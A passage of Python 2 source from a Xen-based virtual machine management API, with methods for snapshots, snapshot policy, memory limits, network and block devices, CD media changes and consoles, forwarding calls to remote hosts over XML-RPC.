# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# return xen_api_success(dom.get_power_state())
# else:
# try:
# remote_ip = BNPoolAPI._host_structs[host_ref]['ip']
# proxy = ServerProxy('http://' + remote_ip + ':9363')
# response = proxy.session.login('root')
# if cmp(response['Status'], 'Failure') == 0:
# return xen_api_error(response['ErrorDescription'])
# session_ref = response['Value']
# return proxy.VM.get_power_state(session_ref, vm_ref)
# except socket.error:
# return xen_api_error('socket error')
def VM_get_resident_on(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM resident Host.
@param session: session of RPC.
@param vm_ref: uuid.
@return: Host uuid.
@rtype: dict.
'''
#host_ref = BNPoolAPI._VM_to_Host[vm_ref]
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
return xen_api_success(host_ref)
def VM_get_snapshots(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM snapshots by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshots.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_get_vdi_snapshots(session, vdi_ref)
def _VM_get_vdi_snapshots(self, session, vdi_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get snapshots of the given VDI.
        @param session: session of RPC.
        @param vdi_ref: VDI's uuid.
@return: snapshots.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
            log.debug('VM_snapshot_vdi>>>>>vdi does not exist...')
return xen_api_success([])
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
            log.debug('sr record does not exist>>>>>')
return xen_api_success([])
sr_type = sr_rec.get('type')
log.debug('sr type>>>>>>>>>>>>>>>%s' % sr_type)
if cmp(sr_type, 'gpfs') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_gpfs(mount_point, vdi_ref)
elif cmp(sr_type, 'mfs') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_mfs(mount_point, vdi_ref)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_ocfs2(mount_point, vdi_ref)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_ocfs2(mount_point, vdi_ref)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshots = proxy.get_snapshots(sr, vdi_ref)
log.debug("snapshots : %s " % snapshots)
return xen_api_success(snapshots)
def VM_get_snapshot_policy(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM snapshot policy by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshot policy.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_get_vdi_snapshot_policy(session, vdi_ref)
def _VM_get_vdi_snapshot_policy(self, session, vdi_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get VM snapshot policy by uuid.
@param session: session of RPC.
@param vdi_ref: VM system VDI's uuid.
@return: snapshot policy.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
            log.debug('VM_snapshot_vdi>>>>>vdi does not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value', None)
if sr_rec:
location = sr_rec['other_config']['location']
sr_type = sr_rec.get('type')
if cmp(sr_type, 'gpfs') == 0 or cmp(sr_type, 'mfs') == 0\
or cmp(sr_type, 'ocfs2') == 0 or cmp(sr_type, 'local_ocfs2') == 0:
proxy = ServerProxy("http://127.0.0.1:10010")
snapshot_policy = proxy.get_snapshot_policy(sr, vdi_ref)
log.debug("snapshot_policy : %s " % snapshot_policy)
else:
sr_ip = location.split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshot_policy = proxy.get_snapshot_policy(sr, vdi_ref)
log.debug("snapshot_policy : %s " % snapshot_policy)
return xen_api_success(snapshot_policy)
else:
return xen_api_success(("1", "100"))
def VM_set_snapshot_policy(self, session, vm_ref, interval, maxnum):
'''
@author: wuyuewen
@summary: Set VM snapshot policy by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
        @param interval: the interval between automatic snapshots, in days.
        @param maxnum: the maximum number of snapshots to keep.
@return: True | False.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
return self._VM_set_vdi_snapshot_policy(session, vdi_ref, interval, maxnum)
def _VM_set_vdi_snapshot_policy(self, session, vdi_ref, interval, maxnum):
'''
@author: wuyuewen
@summary: Internal method. Set VM snapshot policy by uuid.
@param session: session of RPC.
@param vdi_ref: VM system VDI's uuid.
        @param interval: the interval between automatic snapshots, in days.
        @param maxnum: the maximum number of snapshots to keep.
@return: True | False.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
            log.debug('VM_snapshot_vdi>>>>>vdi does not exist...')
return xen_api_success(("1", "100"))
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value', None)
if sr_rec:
sr_type = sr_rec.get('type')
if cmp(sr_type, 'gpfs') == 0 or cmp(sr_type, 'mfs') == 0\
or cmp(sr_type, 'ocfs2') == 0 or cmp(sr_type, 'local_ocfs2') == 0:
proxy = ServerProxy("http://127.0.0.1:10010")
snapshot_policy = proxy.set_snapshot_policy(sr, vdi_ref, interval, maxnum)
log.debug("snapshot_policy : %s " % snapshot_policy)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshot_policy = proxy.set_snapshot_policy(sr, vdi_ref, interval, maxnum)
log.debug("snapshot_policy : %s " % snapshot_policy)
return xen_api_success(snapshot_policy)
else:
return xen_api_success(("1", "100"))
def VM_get_memory_static_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static max.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_static_max(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_static_max', vm_ref)
else:
return self._VM_get_memory_static_max(session, vm_ref)
def _VM_get_memory_static_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static max.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_static_max())
def VM_get_memory_static_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM memory static min.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static min.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_static_min(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_static_min', vm_ref)
else:
return self._VM_get_memory_static_min(session, vm_ref)
def _VM_get_memory_static_min(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get VM memory static min.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static min.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_static_min())
def VM_get_VIFs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM VIFs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VIFs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VIFs(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_VIFs", vm_ref)
else:
return self._VM_get_VIFs(session, vm_ref)
def _VM_get_VIFs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM VIFs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VIFs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vifs())
def VM_get_VBDs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM VBDs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VBDs(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_VBDs", vm_ref)
else:
return self._VM_get_VBDs(session, vm_ref)
def _VM_get_VBDs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM VBDs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vbds())
def VM_get_usb_scsi(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM usb scsi devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_usb_scsi(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_usb_scsi", vm_ref)
else:
return self._VM_get_usb_scsi(session, vm_ref)
def _VM_get_usb_scsi(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM usb scsi devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[3]) == 0:
#log.debug('fibers: %s' % vbd)
result.append(vbd)
return xen_api_success(result)
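    # Inferred from usage in this class: XEN_API_VBD_TYPE indexes 0-3 are
    # CD, Disk, fiber and usb_scsi respectively (see _VM_get_media,
    # _VM_get_disks, _VM_get_fibers and the loop above).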
def VM_get_fibers(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM fiber devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_fibers(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_fibers", vm_ref)
else:
return self._VM_get_fibers(session, vm_ref)
def _VM_get_fibers(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM fiber devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[2]) == 0:
#log.debug('fibers: %s' % vbd)
result.append(vbd)
return xen_api_success(result)
def VM_destroy_usb_scsi(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM usb scsi device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_usb_scsi(session, vm_ref, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_usb_scsi", vm_ref, vbd_ref)
else:
return self._VM_destroy_usb_scsi(session, vm_ref, vbd_ref)
def _VM_destroy_usb_scsi(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM usb scsi device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
storage = self._get_BNStorageAPI_instance()
vdi_ref = self.VBD_get_VDI(session, vbd_ref).get('Value')
response = self.VBD_destroy(session, vbd_ref)
if vdi_ref:
storage.VDI_destroy(session, vdi_ref)
return response
def VM_destroy_fiber(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM fiber device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_fiber(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_fiber", vm_ref, vbd_ref)
else:
return self._VM_destroy_fiber(session, vbd_ref)
def _VM_destroy_fiber(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM fiber device(VBD) by vbd uuid.
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
storage = self._get_BNStorageAPI_instance()
vdi_ref = self.VBD_get_VDI(session, vbd_ref).get('Value')
response = self.VBD_destroy(session, vbd_ref)
if vdi_ref:
storage.VDI_destroy(session, vdi_ref)
return response
def VM_enable_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Enable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_enable_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_enable_media", vbd_ref)
else:
return self._VM_enable_media(session, vbd_ref)
def _VM_enable_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Enable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
response = self.VBD_set_bootable(session, vbd_ref, 1)
return response
def VM_disable_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Disable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_disable_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_disable_media", vbd_ref)
else:
return self._VM_disable_media(session, vbd_ref)
def _VM_disable_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Disable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
response = self.VBD_set_bootable(session, vbd_ref, 0)
return response
def VM_eject_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Eject VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_eject_media(session, vm_ref, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_eject_media", vm_ref, vbd_ref)
else:
return self._VM_eject_media(session, vm_ref, vbd_ref)
def _VM_eject_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Eject VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
        node = XendNode.instance()
        if not node.is_fake_media_exists():
            storage = self._get_BNStorageAPI_instance()
            storage._fake_media_auto_create(session)
# if not os.path.exists(FAKE_MEDIA_PATH):
# os.system("touch %s" % FAKE_MEDIA_PATH)
response = self._VM_media_change(session, vm_ref, FAKE_MEDIA_NAME)
return response
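    # Eject is implemented as a media change to the fake placeholder
    # medium (FAKE_MEDIA_NAME), i.e. the drive stays present but points at
    # an empty image.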
def VM_destroy_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_media", vm_ref, vbd_ref)
else:
return self._VM_destroy_media(session, vbd_ref)
def _VM_destroy_media(self, session, vbd_ref):
'''
@author: wuyuewen
        @summary: Internal method. Destroy VM's media device(cdrom device).
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
response = self.VBD_destroy(session, vbd_ref)
return response
def VM_destroy_VIF(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Destroy VM's VIF device(network device).
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_VIF(session, vm_ref, vif_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_VIF", vm_ref, vif_ref)
else:
return self._VM_destroy_VIF(session, vm_ref, vif_ref)
def _VM_destroy_VIF(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM's VIF device(network device).
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
# self._VM_del_ip_map(session, vm_ref, vif_ref)
response = self.VIF_destroy(session, vif_ref)
return response
def VM_get_available_vbd_device(self, session, vm_ref, device_type = 'xvd'):
'''
@author: wuyuewen
        @summary: Used before creating a VBD device; returns an available device name (xvdX/hdX).
        @precondition: The available range is xvda-xvdj/hda-hdj, limited to 10 devices in total.
@param session: session of RPC.
@param vm_ref: uuid
@param device_type: xvd/hd.
@return: available device name.
@rtype: dict.
@raise xen_api_error: DEVICE_OUT_OF_RANGE, NO_VBD_ERROR
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_available_vbd_device(session, vm_ref, device_type)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_available_vbd_device", vm_ref, device_type)
else:
return self._VM_get_available_vbd_device(session, vm_ref, device_type)
def _VM_get_available_vbd_device(self, session, vm_ref, device_type):
'''
@author: wuyuewen
        @summary: Internal method. Used before creating a VBD device; returns an available device name (xvdX/hdX).
        @precondition: The available range is xvda-xvdj/hda-hdj, limited to 10 devices in total.
@param session: session of RPC.
@param vm_ref: uuid
@param device_type: xvd/hd.
@return: available device name.
@rtype: dict.
@raise xen_api_error: DEVICE_OUT_OF_RANGE, NO_VBD_ERROR
'''
vbds = self._VM_get_VBDs(session, vm_ref).get('Value')
if vbds:
if cmp(len(vbds), DISK_LIMIT+1) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VBD'])
vbds_first_device = self.VBD_get_device(session, vbds[0]).get('Value')
if vbds_first_device.startswith('hd'):
device_list = copy.deepcopy(VBD_DEFAULT_DEVICE)
else:
device_list = copy.deepcopy(VBD_XEN_DEFAULT_DEVICE)
for vbd in vbds:
device = self.VBD_get_device(session, vbd).get('Value')
if device and device in device_list:
device_list.remove(device)
else:
continue
if device_list:
return xen_api_success(device_list[0])
else:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VBD'])
else:
return xen_api_error(['NO_VBD_ERROR', 'VM', vm_ref])
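    # Illustrative call (comment sketch): if the VM's first VBD is 'xvda'
    # and 'xvdb' is also taken, VM_get_available_vbd_device(session, vm_ref)
    # returns a success dict whose 'Value' is the next free name, e.g.
    # 'xvdc' (assuming VBD_XEN_DEFAULT_DEVICE lists xvda..xvdj in order).
    # Note the device_type argument is not consulted here; the list is
    # chosen from the naming of the VM's first existing VBD.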
def VM_get_media(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@return: VBD
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_media(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_media", vm_ref)
else:
return self._VM_get_media(session, vm_ref)
def _VM_get_media(self, session, vm_ref):
'''
@author: wuyuewen
        @summary: Internal method. Get VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@return: VBD
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = None
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "<none/>")
if cmp(vbd_type, XEN_API_VBD_TYPE[0]) == 0:
result = vbd
break
if result:
return xen_api_success(result)
else:
'''
if VM has no media device, create a fake one.
'''
vbd_struct = CD_VBD_DEFAULT_STRUCT
vbd_struct["VM"] = vm_ref
node = XendNode.instance()
if not node.is_fake_media_exists():
vdi = storage._fake_media_auto_create(session).get('Value')
else:
vdi = storage._VDI_get_by_name_label(session, FAKE_MEDIA_NAME).get("Value")
vbd_struct["VDI"] = vdi
return self.VBD_create(session, vbd_struct)
def _VM_get_disks(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[1]) == 0:
result.append(vbd)
return xen_api_success(result)
def VM_media_change(self, session, vm_ref, vdi_name):
'''
@author: wuyuewen
@summary: Change VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vdi_name: VDI's name label.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID, INTERNAL_ERROR
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_media_change(session, vm_ref, vdi_name)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_media_change", vm_ref, vdi_name)
else:
return self._VM_media_change(session, vm_ref, vdi_name)
def _VM_media_change(self, session, vm_ref, vdi_name):
'''
@author: wuyuewen
@summary: Internal method. Change VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vdi_name: VDI's name label.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID, INTERNAL_ERROR
'''
vbd_ref = self._VM_get_media(session, vm_ref).get('Value')
xendom = XendDomain.instance()
xennode = XendNode.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
log.debug("No media, create one.")
vbd_struct = CD_VBD_DEFAULT_STRUCT
vbd_struct["VM"] = vm_ref
self.VBD_create(session, vbd_struct)
# return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cur_vbd_struct = vm.get_dev_xenapi_config('vbd', vbd_ref)
'''
Check the VBD is a media device or not.
'''
if not cur_vbd_struct:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['type'] != XEN_API_VBD_TYPE[0]: # Not CD
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['mode'] != 'RO': # Not read only
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
vdi_uuid = xennode.get_vdi_by_name_label(vdi_name)
new_vdi = xennode.get_vdi_by_uuid(vdi_uuid)
if not new_vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', vdi_name])
new_vdi_image = new_vdi.get_location()
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
new_vbd_struct = {}
for k in cur_vbd_struct.keys():
if k in valid_vbd_keys:
new_vbd_struct[k] = cur_vbd_struct[k]
new_vbd_struct['VDI'] = vdi_uuid
try:
XendTask.log_progress(0, 100,
vm.change_vdi_of_vbd,
new_vbd_struct, new_vdi_image)
except XendError, e:
log.exception("Error in VBD_media_change")
# if str(e).endswith("VmError: Device"):
# log.debug("No media create new...")
# log.debug(new_vbd_struct)
# self.VBD_create(session, new_vbd_struct)
return xen_api_error(['INTERNAL_ERROR', str(e)])
# return xen_api_success_void()
return xen_api_success_void()
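    # Illustrative usage (comment sketch; the ISO name is hypothetical):
    # VM_media_change(session, vm_ref, 'winxp.iso') looks up the VDI named
    # 'winxp.iso', validates that the VM's CD VBD is type CD and mode RO,
    # then swaps its backing image via vm.change_vdi_of_vbd.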
def VM_get_VTPMs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vtpms())
def VM_get_consoles(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's console device(VNC device).
@param session: session of RPC.
@param vm_ref: uuid
@return: console
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_consoles(vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_consoles", vm_ref)
else:
return self._VM_get_consoles(vm_ref)
def _VM_get_consoles(self, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's console device(VNC device).
@param vm_ref: uuid
@return: console
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_consoles())
def VM_get_DPCIs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dpcis())
def VM_get_DSCSIs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dscsis())
def VM_get_DSCSI_HBAs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dscsi_HBAs())
def VM_get_tools_version(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return dom.get_tools_version()
def VM_get_metrics(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_metrics())
#frank
def VM_get_cpu_qos(self, _, vm_ref):
'''
@deprecated: not used
'''
